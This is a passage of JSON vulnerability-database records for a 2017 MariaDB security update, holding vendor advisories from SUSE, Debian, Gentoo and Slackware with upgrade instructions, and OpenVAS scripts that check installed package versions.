rel=\"nofollow\" href=\"http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html\">http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html</a>\n\n", "modified": "2017-02-07T00:07:36", "published": "2017-02-07T00:07:36", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00011.html", "id": "SUSE-SU-2017:0408-1", "type": "suse", "title": "Security update for mysql (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-07T18:59:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "This mariadb version update to 10.0.29 fixes the following issues:\n\n - 
CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)\n - CVE-2017-3244: unspecified vulnerability affecting the DML component\n (bsc#1020877)\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n * XtraDB updated to 5.6.34-79.1\n * TokuDB updated to 5.6.34-79.1\n * Innodb updated to 5.6.35\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog:\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-release-notes\">https://kb.askmonty.org/en/mariadb-10029-release-notes</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-changelog\">https://kb.askmonty.org/en/mariadb-10029-changelog</a>\n\n", "modified": "2017-02-07T18:08:59", "published": "2017-02-07T18:08:59", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00012.html", "id": "SUSE-SU-2017:0411-1", "type": "suse", "title": "Security update for mariadb (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-07T18:59:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", 
"CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "This mariadb version update to 10.0.29 fixes the following issues:\n\n - CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)\n - CVE-2017-3244: unspecified vulnerability affecting the DML component\n (bsc#1020877)\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n * XtraDB updated to 5.6.34-79.1\n * TokuDB updated to 5.6.34-79.1\n * Innodb updated to 5.6.35\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog:\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-release-notes\">https://kb.askmonty.org/en/mariadb-10029-release-notes</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-changelog\">https://kb.askmonty.org/en/mariadb-10029-changelog</a>\n\n", "modified": "2017-02-07T18:11:31", "published": "2017-02-07T18:11:31", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00013.html", "id": 
"SUSE-SU-2017:0412-1", "type": "suse", "title": "Security update for mariadb (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-08-12T01:05:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3770-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 22, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mariadb-10.0\nCVE ID : CVE-2016-6664 CVE-2017-3238 CVE-2017-3243 CVE-2017-3244\n CVE-2017-3257 CVE-2017-3258 CVE-2017-3265 CVE-2017-3291\n CVE-2017-3312 CVE-2017-3317 CVE-2017-3318\nDebian Bug : 842895 851755\n\nSeveral issues have been discovered in the MariaDB database server. The\nvulnerabilities are addressed by upgrading MariaDB to the new upstream\nversion 10.0.29. 
Please see the MariaDB 10.0 Release Notes for further\ndetails:\n\n https://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 10.0.29-0+deb8u1.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2017-01-22T12:31:07", "published": "2017-01-22T12:31:07", "id": "DEBIAN:DSA-3770-1:8F221", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00021.html", "title": "[SECURITY] [DSA 3770-1] mariadb-10.0 security update", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-02-21T01:00:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "### Background\n\nMariaDB is an enhanced, drop-in replacement for MySQL.\n\n### Description\n\nMultiple vulnerabilities have been discovered in MariaDB. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker could possibly escalate privileges, gain access to critical data or complete access to all MariaDB Server accessible data, or cause a Denial of Service condition via unspecified vectors. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MariaDB users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mariadb-10.0.29\"", "modified": "2017-02-20T00:00:00", "published": "2017-02-20T00:00:00", "href": "https://security.gentoo.org/glsa/201702-18", "id": "GLSA-201702-18", "title": "MariaDB: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3312", "CVE-2017-3317", "CVE-2017-3318"], "description": "New mariadb packages are available for Slackware 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/mariadb-10.0.29-i586-1_slack14.2.txz: Upgraded.\n This update fixes several security issues.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3238\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3243\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3244\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3257\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3258\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3265\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3291\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3312\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3317\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3318\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync 
hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mariadb-5.5.54-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mariadb-5.5.54-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mariadb-10.0.29-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mariadb-10.0.29-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mariadb-10.0.29-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/mariadb-10.0.29-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 package:\n63065db92d769dba9fd1b991d4895fa6 mariadb-5.5.54-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne56de4b0a2e44a9d05d98da8ed887b2b mariadb-5.5.54-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nebe1dcbc543c3a9fab5b16fe49cc751c mariadb-10.0.29-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n13ad470dacc9135be578c1507d65d742 mariadb-10.0.29-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nea988b7da09571fb7e4338f492640e95 ap/mariadb-10.0.29-i586-1.txz\n\nSlackware x86_64 -current package:\n059885939b05ae2553d4e537c8edd189 ap/mariadb-10.0.29-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mariadb-10.0.29-i586-1_slack14.2.txz\n\nThen, restart the database server:\n > sh /etc/rc.d/rc.mysqld restart", "modified": "2017-01-18T20:40:17", "published": "2017-01-18T20:40:17", "id": "SSA-2017-018-01", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.435634", "type": "slackware", "title": "[slackware-security] mariadb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29.", "modified": "2019-03-18T00:00:00", "published": "2017-01-22T00:00:00", "id": "OPENVAS:1361412562310703770", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703770", "type": "openvas", "title": "Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3770.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3770-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703770\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\",\n \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\",\n \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_name(\"Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-22 00:00:00 +0100 (Sun, 22 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3770.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"mariadb-10.0 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.29-0+deb8u1.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\");\n script_tag(name:\"summary\", value:\"Several issues have been discovered in\nthe MariaDB database server. 
The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2017-07-24T12:57:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29. Please see the MariaDB 10.0 Release Notes for\nfurther details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/", "modified": "2017-07-07T00:00:00", "published": "2017-01-22T00:00:00", "id": "OPENVAS:703770", "href": "http://plugins.openvas.org/nasl.php?oid=703770", "type": "openvas", "title": "Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3770.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3770-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703770);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\",\n \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\",\n \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_name(\"Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-01-22 00:00:00 +0100 (Sun, 22 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3770.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mariadb-10.0 on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.29-0+deb8u1.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\");\n script_tag(name: \"summary\", value: \"Several issues have been discovered in\nthe MariaDB database server. 
The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29. Please see the MariaDB 10.0 Release Notes for\nfurther details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:28:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-02-17T00:00:00", "id": "OPENVAS:1361412562310851490", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851490", "type": "openvas", "title": "openSUSE: Security Advisory for mariadb (openSUSE-SU-2017:0486-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851490\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-17 05:51:43 +0100 (Fri, 17 Feb 2017)\");\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\",\n \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\",\n \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for mariadb (openSUSE-SU-2017:0486-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mariadb'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This mariadb version update to 10.0.29 fixes the following issues:\n\n - CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n\n - CVE-2017-3257: unspecified 
vulnerability affecting InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the DML component\n (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n\n * XtraDB updated to 5.6.34-79.1\n\n * TokuDB updated to 5.6.34-79.1\n\n * Innodb updated to 5.6.35\n\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog are linked in the references.\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\");\n\n script_tag(name:\"affected\", value:\"mariadb on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:0486-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10029-release-notes\");\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10029-changelog\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient-devel\", rpm:\"libmysqlclient-devel~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n 
